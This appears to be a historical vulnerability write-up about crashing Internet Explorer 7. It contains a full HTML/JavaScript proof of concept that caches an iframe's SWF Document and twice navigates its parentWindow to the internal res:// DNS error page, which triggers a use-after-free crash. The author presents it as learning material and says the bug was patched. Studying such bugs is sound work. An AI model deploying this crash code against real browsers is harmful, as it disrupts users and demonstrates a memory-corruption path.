DoS: IE7 Crash via Cached SWF Document and res:// Protocol Navigation

I was applying the cached-Document technique to IE’s internal res:// protocol URLs — specifically res://ieframe.dll/dnserror.htm, the DNS error page. After caching the Document of an SWF-loaded iframe and then navigating the cached document’s parentWindow to that res:// URL twice in succession, the browser crashed. It was a targeted variant of the same cached-document use-after-free class, this time triggered specifically by the internal error page renderer.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>DoS_IE7_swf_ResProtocol</title></head>
<body>
<font face="Tahoma" size="2">
<center><h2>DoS_IE7_swf_ResProtocol</h2></center>
<center>
<input type="button" value="Do It!" onclick="loadItTwice()"><br />
(And wait 5 seconds because we have to load the swf inside the IFRAME, cache it's <b>D</b>ocument, and change the URL of the IFRAME twice.
</center>
<hr />
1) Load any <font color="blue"><b>swf</b></font> inside an IFRAME.<br />

<font color="red">window[0]</font>.location.replace('<font color="blue">empty.swf</font>');<br /><br />

2) Cache the <font color="blue"><b>D</b></font>ocument of the IFRAME in the <b>cachedDocument</b> variable.<br />
<font color="blue">cachedDocument</font> = document.all.flashContainer.<font color="blue"><b>D</b></font>ocument;<br /><br />
3) Change the URL of the IFRAME.<br />
window[0].location = "<font color="blue">about:blank</font>";<br /><br />

4) Change location of the cached <font color="blue"><b>D</b></font>ocument.<br />
<font color="blue"><b>cachedDocument</b>.parentWindow.location</font> = 'res://ieframe.dll/dnserror.htm';<br /><br />

5) Change location of the cached <font color="blue"><b>D</b></font>ocument again, and it will crash the Browser.<br />
<font color="blue"><b>cachedDocument</b>.parentWindow.location</font> = 'res://ieframe.dll/dnserror.htm';<br /><br />

<hr />
<br />
<center>
	<iframe id="flashContainer" width="100" height="100"></iframe>
</center>
</font>


<script language="JavaScript">
var cachedDocument;
function loadItTwice()
{
	window[0].location.replace('empty.swf');

	setTimeout('cachedDocument = document.all.flashContainer.Document;', 1000);

	setTimeout('window[0].location = "about:blank";', 2000);
	setTimeout('cachedDocument.parentWindow.location = "res://ieframe.dll/dnserror.htm";', 3000);
	setTimeout('cachedDocument.parentWindow.location = "res://ieframe.dll/dnserror.htm";', 5000);
}
</script>
</body>
</html>

The sequence loads a SWF into an iframe, caches its Document object, navigates the iframe to about:blank (which partially invalidates the cached reference), then directs the cached document’s parentWindow.location to res://ieframe.dll/dnserror.htm — an internal IE resource. The first navigation to the res:// URL may partially succeed; the second navigation two seconds later hits an already-modified internal state and causes a crash. The res:// protocol handler appears to have had a different lifecycle from normal URL handlers, making it a reliable trigger for this particular fault.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.